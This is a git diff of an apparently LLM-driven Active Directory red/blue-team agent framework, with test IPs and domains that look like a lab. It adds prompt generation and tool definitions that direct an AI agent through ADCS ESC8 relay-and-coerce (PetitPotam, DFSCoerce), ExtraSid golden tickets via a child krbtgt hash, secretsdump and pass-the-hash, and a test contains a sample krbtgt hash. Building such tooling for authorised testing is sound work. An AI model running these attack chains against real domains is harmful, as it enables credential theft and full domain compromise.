+/// Extract the first whitespace/comma-delimited token from a string. +/// +/// Handles cases where LLM agents pass multi-IP scan results or +/// nmap arguments in a single field, e.g.: +/// - `"192.168.58.10 192.168.58.20 192.168.58.30"` → `"192.168.58.10"` +/// - `"192.168.58.40 -p 53,88 --open"` → `"192.168.58.40"` +fn first_token(s: &str) -> &str { + s.split_whitespace().next().unwrap_or(s) +} + +/// Returns true for CIDR notation like `10.0.0.0/24`. +/// +/// CIDR ranges represent networks, not individual hosts, so they +/// must not be used as `destination.address` span values. +fn is_cidr(s: &str) -> bool { + if let Some((ip_part, mask)) = s.rsplit_once('/') { + if let Ok(bits) = mask.parse::() { + return bits <= 128 && ip_part.parse::().is_ok(); + } + } + false +} + fn is_ip_address(s: &str) -> bool { s.parse::().is_ok() } @@ -182,6 +212,66 @@ mod tests { assert!(info.target_fqdn.is_none()); } + #[test] + fn extract_target_info_rejects_cidr() { + let args = serde_json::json!({"target": "192.168.58.0/24"}); + let info = extract_target_info(&args); + assert!( + info.target_ip.is_none(), + "CIDR should not be used as target_ip" + ); + assert!(info.target_fqdn.is_none()); + } + + #[test] + fn extract_target_info_rejects_cidr_in_target_ip() { + let args = serde_json::json!({"target_ip": "192.168.58.0/25"}); + let info = extract_target_info(&args); + assert!( + info.target_ip.is_none(), + "CIDR should not be used as target_ip" + ); + } + + #[test] + fn extract_target_info_multi_ip_takes_first() { + let args = serde_json::json!({"target": "192.168.58.10 192.168.58.20 192.168.58.30"}); + let info = extract_target_info(&args); + assert_eq!(info.target_ip.as_deref(), Some("192.168.58.10")); + } + + #[test] + fn extract_target_info_nmap_args_takes_first_ip() { + let args = serde_json::json!({"target": "192.168.58.40 -p 53,88,135 --open -sv -o"}); + let info = extract_target_info(&args); + assert_eq!(info.target_ip.as_deref(), Some("192.168.58.40")); + } + + #[test] + fn extract_target_info_multi_fqdn_takes_first() { + let args = serde_json::json!({"target": "dc01.contoso.local dc02.contoso.local"}); + let info = extract_target_info(&args); + assert_eq!(info.target_fqdn.as_deref(), Some("dc01.contoso.local")); + } + + #[test] + fn first_token_extracts_correctly() { + assert_eq!(first_token("192.168.58.10 192.168.58.20"), "192.168.58.10"); + assert_eq!(first_token("192.168.58.40 -p 53,88"), "192.168.58.40"); + assert_eq!(first_token("single"), "single"); + assert_eq!(first_token(""), ""); + } + + #[test] + fn is_cidr_detects_ranges() { + assert!(is_cidr("192.168.58.0/24")); + assert!(is_cidr("192.168.0.0/16")); + assert!(is_cidr("10.0.0.0/8")); + assert!(!is_cidr("192.168.58.10")); + assert!(!is_cidr("dc01.contoso.local")); + assert!(!is_cidr("192.168.58.0/abc")); + } + #[test] fn infer_from_info_fqdn() { let info = ToolTargetInfo { diff --git a/ares-llm/src/agent_loop/callbacks.rs b/ares-llm/src/agent_loop/callbacks.rs index 28f11eec..4687ba77 100644 --- a/ares-llm/src/agent_loop/callbacks.rs +++ b/ares-llm/src/agent_loop/callbacks.rs @@ -61,10 +61,37 @@ pub(super) fn handle_builtin_callback(call: &ToolCall) -> Result .as_str() .unwrap_or("") .to_string(); - info!(finding_type = %finding_type, "Finding reported: {description}"); - Ok(CallbackResult::Continue(format!( - "Finding recorded: {finding_type}" - ))) + let target = call.arguments["target"].as_str().unwrap_or("").to_string(); + let severity = call.arguments["severity"] + .as_str() + .unwrap_or("info") + .to_string(); + info!(finding_type = %finding_type, target = %target, severity = %severity, "Finding reported: {description}"); + + // Route into `llm_findings` (NOT `discoveries`). The LLM-asserted + // payload reaches reports for context but MUST NOT feed + // `publish_vulnerability` — only parser-produced discoveries do. + let vuln_id = if target.is_empty() { + format!("finding_{finding_type}") + } else { + format!("finding_{}_{}", finding_type, target.replace('.', "_")) + }; + let finding = serde_json::json!({ + "vulnerabilities": [{ + "vuln_id": vuln_id, + "vuln_type": finding_type, + "target": target, + "details": { + "description": description, + "severity": severity, + "discovered_by": "agent_report_finding", + }, + }] + }); + Ok(CallbackResult::LlmFinding { + response: format!("Finding recorded: {finding_type}"), + finding, + }) } "report_lateral_success" => { let target = call.arguments["target_ip"] @@ -77,9 +104,25 @@ pub(super) fn handle_builtin_callback(call: &ToolCall) -> Result .unwrap_or("") .to_string(); info!(target = %target, technique = %technique, "Lateral movement succeeded"); - Ok(CallbackResult::Continue(format!( - "Lateral movement recorded: {technique} → {target}" - ))) + + // Surface as an LLM finding only — does NOT feed `publish_vulnerability`. + let vuln_id = format!("lateral_success_{}_{}", technique, target.replace('.', "_")); + let finding = serde_json::json!({ + "vulnerabilities": [{ + "vuln_id": vuln_id, + "vuln_type": format!("lateral_{technique}"), + "target": target, + "details": { + "description": format!("Successful lateral movement via {technique}"), + "severity": "high", + "discovered_by": "agent_lateral_movement", + }, + }] + }); + Ok(CallbackResult::LlmFinding { + response: format!("Lateral movement recorded: {technique} → {target}"), + finding, + }) } "report_lateral_failed" => { let target = call.arguments["target_ip"] @@ -344,14 +387,18 @@ mod tests { fn report_finding() { let call = make_call( "report_finding", - serde_json::json!({"finding_type": "kerberoastable_account", "description": "Found SPN"}), + serde_json::json!({"finding_type": "kerberoastable_account", "description": "Found SPN", "target": "192.168.58.10"}), ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("kerberoastable_account")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("kerberoastable_account")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "kerberoastable_account"); + assert_eq!(vulns[0]["target"], "192.168.58.10"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } @@ -363,11 +410,14 @@ mod tests { ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("psexec")); - assert!(msg.contains("192.168.58.10")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("psexec")); + assert!(response.contains("192.168.58.10")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "lateral_psexec"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } @@ -380,11 +430,13 @@ mod tests { ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("wmiexec")); - assert!(msg.contains("srv01.contoso.local")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("wmiexec")); + assert!(response.contains("srv01.contoso.local")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["vuln_type"], "lateral_wmiexec"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } diff --git a/ares-llm/src/agent_loop/runner.rs b/ares-llm/src/agent_loop/runner.rs index 72ab7db9..d4a6e4ac 100644 --- a/ares-llm/src/agent_loop/runner.rs +++ b/ares-llm/src/agent_loop/runner.rs @@ -127,6 +127,7 @@ pub async fn run_agent_loop( let mut steps: u32 = 0; let mut tool_calls_dispatched: u32 = 0; let mut all_discoveries: Vec = Vec::new(); + let mut all_llm_findings: Vec = Vec::new(); let mut all_tool_outputs: Vec = Vec::new(); // Dynamic tool filtering: track unavailable tools and per-tool call counts @@ -146,6 +147,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -170,6 +172,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -227,6 +230,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -263,6 +267,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -274,6 +279,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -551,6 +557,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -563,6 +570,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -573,6 +581,10 @@ pub async fn run_agent_loop( } messages.push(tr); } + Ok(CallbackResult::LlmFinding { response, finding }) => { + all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call_id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result( &call_id, @@ -625,6 +637,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -637,6 +650,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -647,6 +661,10 @@ pub async fn run_agent_loop( } messages.push(tr); } + Ok(CallbackResult::LlmFinding { response, finding }) => { + all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call.id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result(&call.id, format!("Callback error: {e}")); @@ -697,6 +715,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -709,6 +728,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -719,6 +739,10 @@ pub async fn run_agent_loop( } messages.push(tr); } + Ok(CallbackResult::LlmFinding { response, finding }) => { + all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call.id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result(&call.id, format!("Callback error: {e}")); if session_log.enabled() { @@ -734,6 +758,7 @@ pub async fn run_agent_loop( /// Centralized exit path: writes the terminal `outcome` record to the /// session log and assembles the `AgentLoopOutcome`. +#[allow(clippy::too_many_arguments)] fn finish( session_log: &SessionLog, steps: u32, @@ -741,6 +766,7 @@ fn finish( total_usage: TokenUsage, tool_calls_dispatched: u32, discoveries: Vec, + llm_findings: Vec, tool_outputs: Vec, ) -> AgentLoopOutcome { if session_log.enabled() { @@ -753,6 +779,7 @@ fn finish( steps, tool_calls_dispatched, discoveries, + llm_findings, tool_outputs, } } diff --git a/ares-llm/src/agent_loop/tests.rs b/ares-llm/src/agent_loop/tests.rs index e9bdec6c..f683be0b 100644 --- a/ares-llm/src/agent_loop/tests.rs +++ b/ares-llm/src/agent_loop/tests.rs @@ -57,10 +57,12 @@ fn handle_report_finding_callback() { }; let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("smb_signing_disabled")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("smb_signing_disabled")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["vuln_type"], "smb_signing_disabled"); } - _ => panic!("Expected Continue"), + _ => panic!("Expected LlmFinding"), } } diff --git a/ares-llm/src/agent_loop/types.rs b/ares-llm/src/agent_loop/types.rs index 9c3bf8bf..933da384 100644 --- a/ares-llm/src/agent_loop/types.rs +++ b/ares-llm/src/agent_loop/types.rs @@ -40,6 +40,14 @@ pub enum CallbackResult { RequestAssistance { issue: String, context: String }, /// Callback processed, continue the loop with this response. Continue(String), + /// LLM-fabricated finding — continue the loop and route the structured + /// payload into `llm_findings` (NOT `discoveries`). Reports may surface + /// these for context, but they MUST NOT feed `publish_*` state writes; + /// only parser-produced discoveries are authoritative. + LlmFinding { + response: String, + finding: serde_json::Value, + }, } /// Trait for providing custom callback handlers to the agent loop. @@ -78,7 +86,13 @@ pub struct AgentLoopOutcome { /// Number of tool calls dispatched. pub tool_calls_dispatched: u32, /// Accumulated structured discoveries from all tool results. + /// Only parser-produced — never LLM-fabricated. Safe to feed into + /// `extract_discoveries` → `publish_*`. pub discoveries: Vec, + /// LLM-fabricated findings (`report_finding` / `report_lateral_success`). + /// Surfaced in reports but never used as authoritative state — must never + /// feed `publish_*` calls. + pub llm_findings: Vec, /// Raw tool output strings for secondary regex extraction. pub tool_outputs: Vec, } diff --git a/ares-llm/src/prompt/blue.rs b/ares-llm/src/prompt/blue.rs index 6d2b579c..5bf24702 100644 --- a/ares-llm/src/prompt/blue.rs +++ b/ares-llm/src/prompt/blue.rs @@ -349,6 +349,10 @@ mod tests { use super::*; use serde_json::json; + // ----------------------------------------------------------------------- + // generate_blue_task_prompt + // ----------------------------------------------------------------------- + #[test] fn generate_blue_task_prompt_returns_none_for_unknown_type() { let params = json!({}); @@ -397,6 +401,10 @@ mod tests { assert!(generate_blue_task_prompt("host_investigation", "t-7", ¶ms, "state").is_some()); } + // ----------------------------------------------------------------------- + // blue_role_template + // ----------------------------------------------------------------------- + #[test] fn role_template_triage() { assert_eq!( @@ -445,6 +453,10 @@ mod tests { ); } + // ----------------------------------------------------------------------- + // build_blue_system_prompt + // ----------------------------------------------------------------------- + #[test] fn system_prompt_succeeds_for_triage() { let caps = vec!["query_loki".to_string(), "record_evidence".to_string()]; @@ -505,6 +517,10 @@ mod tests { assert!(!result.is_empty()); } + // ----------------------------------------------------------------------- + // build_initial_alert_prompt + // ----------------------------------------------------------------------- + #[test] fn initial_alert_prompt_extracts_alert_name_from_labels() { let alert = json!({ diff --git a/ares-llm/src/prompt/exploit/adcs.rs b/ares-llm/src/prompt/exploit/adcs.rs index 02b377dd..2c9b4ef5 100644 --- a/ares-llm/src/prompt/exploit/adcs.rs +++ b/ares-llm/src/prompt/exploit/adcs.rs @@ -42,7 +42,7 @@ pub(crate) fn generate_adcs_enumerate_prompt( render_template_with_context(TASK_EXPLOIT_ADCS_ENUMERATE, &ctx) } -/// Generate prompt for ADCS ESC1/ESC4/ESC8 exploitation tasks. +/// Generate prompt for ADCS ESC exploitation tasks. pub(crate) fn generate_adcs_esc_prompt( task_id: &str, payload: &Value, @@ -51,22 +51,72 @@ pub(crate) fn generate_adcs_esc_prompt( domain: &str, vuln_type: &str, ) -> anyhow::Result { + // CA server: try ca_server, ca_host, target_ip, then fall back to target let ca_server = payload .get("ca_server") + .or_else(|| payload.get("ca_host")) + .or_else(|| payload.get("target_ip")) .and_then(|v| v.as_str()) .unwrap_or(target); + let ca_name = payload + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or(""); let template = payload .get("template") .and_then(|v| v.as_str()) .unwrap_or(""); + let username = payload + .get("username") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let password = payload + .get("password") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let dc_ip = payload.get("dc_ip").and_then(|v| v.as_str()).unwrap_or(""); + let admin_sid = payload + .get("admin_sid") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let instructions = payload + .get("instructions") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let coerce_target = payload + .get("coerce_target") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let coerce_targets: Vec = payload + .get("coerce_targets") + .and_then(|v| v.as_array()) + .map(|arr| { + arr.iter() + .filter_map(|v| v.as_str().map(String::from)) + .collect() + }) + .unwrap_or_default(); + let listener_ip = payload + .get("listener_ip") + .and_then(|v| v.as_str()) + .unwrap_or(""); let vt_lower = vuln_type.to_lowercase(); let mut ctx = Context::new(); ctx.insert("task_id", task_id); ctx.insert("ca_server", ca_server); + ctx.insert("ca_name", ca_name); ctx.insert("template", template); ctx.insert("domain", domain); + ctx.insert("username", username); + ctx.insert("password", password); + ctx.insert("dc_ip", dc_ip); + ctx.insert("admin_sid", admin_sid); + ctx.insert("instructions", instructions); + ctx.insert("coerce_target", coerce_target); + ctx.insert("coerce_targets", &coerce_targets); + ctx.insert("listener_ip", listener_ip); ctx.insert("vuln_upper", &vuln_type.to_uppercase()); ctx.insert("is_esc8", &vt_lower.contains("esc8")); insert_state_context(&mut ctx, state, "exploit", Some(target)); diff --git a/ares-llm/src/prompt/exploit/mod.rs b/ares-llm/src/prompt/exploit/mod.rs index bbc554d7..ab5de3df 100644 --- a/ares-llm/src/prompt/exploit/mod.rs +++ b/ares-llm/src/prompt/exploit/mod.rs @@ -87,9 +87,9 @@ pub(crate) fn generate_exploit_prompt( ); } - // ADCS ESC1 / ESC4 / ESC8 + // ADCS ESC exploitation (all ESC types) let vt_lower = vuln_type.to_lowercase(); - if vt_lower.contains("esc1") || vt_lower.contains("esc4") || vt_lower.contains("esc8") { + if vt_lower.contains("esc") { return adcs::generate_adcs_esc_prompt(task_id, payload, state, target, domain, vuln_type); } diff --git a/ares-llm/src/prompt/exploit/trust.rs b/ares-llm/src/prompt/exploit/trust.rs index 245f9ed9..a871ec3e 100644 --- a/ares-llm/src/prompt/exploit/trust.rs +++ b/ares-llm/src/prompt/exploit/trust.rs @@ -48,6 +48,12 @@ pub(crate) fn generate_trust_key_prompt( .get("trust_key") .and_then(|v| v.as_str()) .unwrap_or(""); + // Child krbtgt hash, when known, enables the ExtraSid-via-child-krbtgt + // path (preferred for child-to-parent — does NOT need a trust key). + let child_krbtgt_hash_payload = payload + .get("child_krbtgt_hash") + .and_then(|v| v.as_str()) + .unwrap_or(""); // Look up password from state if not in payload let password = if password.is_empty() { @@ -106,6 +112,31 @@ pub(crate) fn generate_trust_key_prompt( .and_then(|v| v.as_str()) .unwrap_or(dc_ip); + // Resolve the target DC hostname from state hosts. + // Kerberos auth requires a hostname (not IP) matching the SPN in the ticket. + let target_dc_hostname = if let Some(s) = state { + // First try: find a host whose IP matches target_dc_hint + s.hosts + .iter() + .find(|h| h.ip == target_dc_hint && !h.hostname.is_empty()) + .map(|h| h.hostname.clone()) + // Fallback: any DC host in the trusted domain + .or_else(|| { + s.hosts + .iter() + .find(|h| { + h.is_dc + && h.hostname + .to_lowercase() + .ends_with(&format!(".{}", trusted_domain.to_lowercase())) + }) + .map(|h| h.hostname.clone()) + }) + .unwrap_or_default() + } else { + String::new() + }; + let trust_key_or_placeholder = if has_trust_key { trust_key } else { @@ -133,6 +164,28 @@ pub(crate) fn generate_trust_key_prompt( target_sid }; + // Look up child krbtgt hash from state if not already in payload. + let child_krbtgt_hash: String = if !child_krbtgt_hash_payload.is_empty() { + child_krbtgt_hash_payload.to_string() + } else if is_child_to_parent { + if let Some(s) = state { + s.hashes + .iter() + .find(|h| { + h.username.eq_ignore_ascii_case("krbtgt") + && h.domain.eq_ignore_ascii_case(domain) + && h.hash_type.eq_ignore_ascii_case("NTLM") + }) + .map(|h| h.hash_value.clone()) + .unwrap_or_default() + } else { + String::new() + } + } else { + String::new() + }; + let has_child_krbtgt = !child_krbtgt_hash.is_empty(); + // Admin hash for hash-based raiseChild auth (used when password is empty) let admin_hash = payload .get("admin_hash") @@ -153,12 +206,15 @@ pub(crate) fn generate_trust_key_prompt( ctx.insert("is_child_to_parent", &is_child_to_parent); ctx.insert("trusted_domain_prefix", &trusted_domain_prefix); ctx.insert("target_dc_hint", target_dc_hint); + ctx.insert("target_dc_hostname", &target_dc_hostname); ctx.insert("trust_key_or_placeholder", trust_key_or_placeholder); ctx.insert("trust_key_val", trust_key_val); ctx.insert("source_sid_val", source_sid_val); ctx.insert("target_sid_val", target_sid_val); ctx.insert("extra_sid_val", extra_sid_val); ctx.insert("admin_hash", admin_hash); + ctx.insert("child_krbtgt_hash", &child_krbtgt_hash); + ctx.insert("has_child_krbtgt", &has_child_krbtgt); ctx.insert("step_extract", &step_extract); ctx.insert("step_sid", &step_sid); ctx.insert("step_forge", &step_forge); diff --git a/ares-llm/src/prompt/helpers.rs b/ares-llm/src/prompt/helpers.rs index 532df40f..2e9dcab1 100644 --- a/ares-llm/src/prompt/helpers.rs +++ b/ares-llm/src/prompt/helpers.rs @@ -30,6 +30,12 @@ pub(crate) fn insert_credential_context(ctx: &mut Context, payload: &Value) { ); } } + // Surface bind_domain so templates can instruct the LLM to use it + if let Some(bd) = payload.get("bind_domain").and_then(|v| v.as_str()) { + if !bd.is_empty() { + ctx.insert("bind_domain", bd); + } + } } /// Insert formatted state context into a Tera context. diff --git a/ares-llm/src/prompt/recon.rs b/ares-llm/src/prompt/recon.rs index 8c098d09..7ac881a7 100644 --- a/ares-llm/src/prompt/recon.rs +++ b/ares-llm/src/prompt/recon.rs @@ -34,6 +34,24 @@ pub(crate) fn generate_recon_prompt( ctx.insert("techniques", &techniques); } + // Single technique (e.g. certipy_find, ldap_group_enumeration) + if let Some(technique) = payload["technique"].as_str() { + ctx.insert("technique", technique); + } + + // Task-specific instructions (e.g. certipy commands, LDAP queries) + if let Some(instructions) = payload["instructions"].as_str() { + ctx.insert("instructions", instructions); + } + + // NTLM hash for pass-the-hash authentication + if let Some(ntlm_hash) = payload["ntlm_hash"].as_str() { + ctx.insert("ntlm_hash", ntlm_hash); + } + if let Some(hash_username) = payload["hash_username"].as_str() { + ctx.insert("hash_username", hash_username); + } + insert_state_context(&mut ctx, state, "recon", payload["target_ip"].as_str()); render_template_with_context(TASK_RECON, &ctx) diff --git a/ares-llm/src/prompt/tests.rs b/ares-llm/src/prompt/tests.rs index 793b101b..faa74cfa 100644 --- a/ares-llm/src/prompt/tests.rs +++ b/ares-llm/src/prompt/tests.rs @@ -511,6 +511,56 @@ fn exploit_adcs_esc8() { assert!(prompt.contains("ntlmrelayx")); assert!(prompt.contains("web enrollment")); assert!(!prompt.contains("certipy_request")); + // No coerce_target field provided -> no "Coerce Target:" header rendered + assert!(!prompt.contains("Coerce Target:")); +} + +#[test] +fn exploit_adcs_esc8_renders_coerce_target_when_present() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26", &payload, None).unwrap(); + assert!(prompt.contains("Coerce Target (primary): 192.168.58.20")); + assert!(prompt.contains("Relay Listener: 192.168.58.50")); + assert!(prompt.contains("Coerce 192.168.58.20")); +} + +#[test] +fn exploit_adcs_esc8_renders_fallback_targets() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "coerce_targets": ["192.168.58.20", "192.168.58.30", "192.168.58.51"], + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26b", &payload, None).unwrap(); + assert!(prompt.contains("Fallback Coerce Targets")); + assert!(prompt.contains("192.168.58.30")); + assert!(prompt.contains("192.168.58.51")); +} + +#[test] +fn exploit_adcs_esc8_omits_fallback_block_when_only_one_candidate() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "coerce_targets": ["192.168.58.20"], + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26c", &payload, None).unwrap(); + assert!(!prompt.contains("Fallback Coerce Targets")); } #[test] @@ -549,6 +599,42 @@ fn exploit_child_to_parent_has_raise_child() { assert!(prompt.contains("Enterprise Admins")); } +#[test] +fn exploit_child_to_parent_offers_extra_sid_via_child_krbtgt() { + let payload = serde_json::json!({ + "vuln_type": "child_to_parent", + "target": "192.168.58.10", + "domain": "child.contoso.local", + "trusted_domain": "contoso.local", + "username": "Administrator", + "password": "P@ss1", + "dc_ip": "192.168.58.10", + "source_sid": "S-1-5-21-1111-2222-3333", + "target_sid": "S-1-5-21-4444-5555-6666", + "child_krbtgt_hash": "8c6d94541dbc90f085e86828428d2cbf", + }); + let prompt = generate_task_prompt("exploit", "t-32", &payload, None).unwrap(); + // ExtraSid via child krbtgt — generate_golden_ticket with extra_sid pointing + // at the parent's Enterprise Admins SID (RID 519). + assert!(prompt.contains("INTRA-FOREST CHILD→PARENT")); + assert!(prompt.contains("generate_golden_ticket")); + assert!(prompt.contains("8c6d94541dbc90f085e86828428d2cbf")); + assert!(prompt.contains("S-1-5-21-4444-5555-6666-519")); + // Followed by secretsdump_kerberos on the parent DC. + assert!(prompt.contains("secretsdump_kerberos")); + // The intra-forest path should NOT *invoke* extract_trust_key/get_sid/ + // create_inter_realm_ticket — those are unnecessary when the child krbtgt + // is in hand and previously caused the LLM to bail out on empty creds. + // We allow the names to appear in a "Do NOT call" instruction but never + // as actual function-call syntax. + assert!(!prompt.contains("extract_trust_key(")); + assert!(!prompt.contains("create_inter_realm_ticket(")); + assert!(prompt.contains("Do NOT call extract_trust_key")); + // Fallbacks for SPN target name validation / DRSUAPI hardening. + assert!(prompt.contains("just_dc_user='krbtgt'")); + assert!(prompt.contains("use_vss=true")); +} + #[test] fn exploit_mssql_lateral_enumeration() { let state = StateSnapshot { diff --git a/ares-llm/src/routing/credentials.rs b/ares-llm/src/routing/credentials.rs index ff72f614..c37cc46e 100644 --- a/ares-llm/src/routing/credentials.rs +++ b/ares-llm/src/routing/credentials.rs @@ -11,8 +11,9 @@ use super::domain::normalize_domain; /// Enforces AD trust-scope rules: /// - Same domain: always valid /// - Parent → child: parent-domain creds can authenticate to child domain LDAP -/// - Child → parent: blocked (child creds cannot auth to parent LDAP) -/// - Cross-forest: blocked for direct LDAP authentication +/// - Child → parent: valid (NTLM/Kerberos auth traverses parent-child trust) +/// - Cross-forest bidirectional: valid (NTLM auth traverses forest trust) +/// - Cross-forest one-way inbound only: blocked pub fn is_valid_credential_for_domain( cred_domain: &str, target_domain: &str, @@ -32,15 +33,24 @@ pub fn is_valid_credential_for_domain( return true; } - // Child → parent: blocked + // Child → parent: valid — NTLM/Kerberos authentication traverses the + // parent-child trust bidirectionally. The target DC forwards the auth + // request to the child domain DC via the trust's secure channel. // e.g. cred=north.contoso.local, target=contoso.local if cred_lower.ends_with(&format!(".{target_lower}")) { - return false; + return true; } - // Cross-forest: block if either side is a known trust - if trusted_domains.contains_key(&target_lower) || trusted_domains.contains_key(&cred_lower) { - return false; + // Cross-forest: allow if bidirectional trust exists + if let Some(trust) = trusted_domains.get(&target_lower) { + if trust.direction == "bidirectional" || trust.direction == "outbound" { + return true; + } + } + if let Some(trust) = trusted_domains.get(&cred_lower) { + if trust.direction == "bidirectional" || trust.direction == "inbound" { + return true; + } } // Unknown relationship: block by default (cross-domain LDAP without trust info is risky) @@ -188,9 +198,9 @@ mod tests { } #[test] - fn child_to_parent_blocked() { + fn child_to_parent_valid() { let trusts = HashMap::new(); - assert!(!is_valid_credential_for_domain( + assert!(is_valid_credential_for_domain( "north.contoso.local", "contoso.local", &trusts @@ -198,7 +208,7 @@ mod tests { } #[test] - fn cross_forest_blocked() { + fn cross_forest_bidirectional_valid() { let mut trusts = HashMap::new(); trusts.insert( "fabrikam.local".to_string(), @@ -210,6 +220,17 @@ mod tests { sid_filtering: true, }, ); + assert!(is_valid_credential_for_domain( + "contoso.local", + "fabrikam.local", + &trusts + )); + } + + #[test] + fn cross_forest_no_trust_blocked() { + let trusts = HashMap::new(); + // No trust info at all → blocked assert!(!is_valid_credential_for_domain( "contoso.local", "fabrikam.local", @@ -228,11 +249,12 @@ mod tests { } #[test] - fn child_cred_blocked_for_parent_domain() { + fn child_cred_valid_for_parent_domain() { let trusts = HashMap::new(); let creds = vec![make_cred("admin", "north.contoso.local", "P@ss1")]; let map = HashMap::new(); let found = find_domain_credential("contoso.local", &creds, &map, &trusts); - assert!(found.is_none()); + assert!(found.is_some()); + assert_eq!(found.unwrap().domain, "north.contoso.local"); } } diff --git a/ares-llm/src/tool_registry/blue/state.rs b/ares-llm/src/tool_registry/blue/state.rs index a92085c0..3ac83e4f 100644 --- a/ares-llm/src/tool_registry/blue/state.rs +++ b/ares-llm/src/tool_registry/blue/state.rs @@ -9,7 +9,7 @@ pub(super) fn investigation_state_tool_definitions() -> Vec { vec![ ToolDefinition { name: "add_evidence".into(), - description: "Add a single evidence item to the investigation. For multiple items, prefer add_evidence_batch to record them all in one call.".into(), + description: "Add a single evidence item to the investigation. The `value` MUST be an IOC that appeared in a recent Loki/Prometheus query result (or a MITRE technique ID like T1003.006) — values not seen in observed query data are rejected. For multiple items, prefer add_evidence_batch to record them all in one call.".into(), input_schema: json!({ "type": "object", "properties": { @@ -54,7 +54,7 @@ pub(super) fn investigation_state_tool_definitions() -> Vec { }, ToolDefinition { name: "add_evidence_batch".into(), - description: "Add multiple evidence items in a single call. Use this instead of calling add_evidence repeatedly — it records all items in one Redis pipeline round-trip and has its own separate call budget.".into(), + description: "Add multiple evidence items in a single call. Each item's `value` MUST be an IOC observed in a recent Loki/Prometheus query (or a MITRE technique ID) — items whose values were not seen in any recorded query result are rejected. Use this instead of calling add_evidence repeatedly — it records all items in one Redis pipeline round-trip and has its own separate call budget.".into(), input_schema: json!({ "type": "object", "properties": { diff --git a/ares-llm/src/tool_registry/coercion.rs b/ares-llm/src/tool_registry/coercion.rs index 9c295e1a..28836562 100644 --- a/ares-llm/src/tool_registry/coercion.rs +++ b/ares-llm/src/tool_registry/coercion.rs @@ -195,6 +195,49 @@ pub(super) fn tool_definitions() -> Vec { "required": ["target_ip"] }), }, + ToolDefinition { + name: "relay_and_coerce".into(), + description: "Run the full ADCS ESC8 relay+coerce attack as ONE deterministic call. Starts ntlmrelayx targeting the AD CS web enrollment endpoint, then coerces a remote machine to authenticate back: phase 1 attempts unauthenticated PetitPotam (works on unpatched DCs without any creds — preferred); phase 2 falls back to authenticated DFSCoerce (MS-DFSNM); phase 3 falls back to coercer over MS-EFSR → MS-RPRN if creds are supplied. CRITICAL: source ≠ target. coerce_target MUST be a different machine than ca_host — Windows NTLM same-machine loopback protection blocks relay when the coerced host is the relay target. Coerce a DC or other machine and relay it to the CA. The captured certificate is decoded from the relay log and a `certificate_obtained` vulnerability is emitted automatically 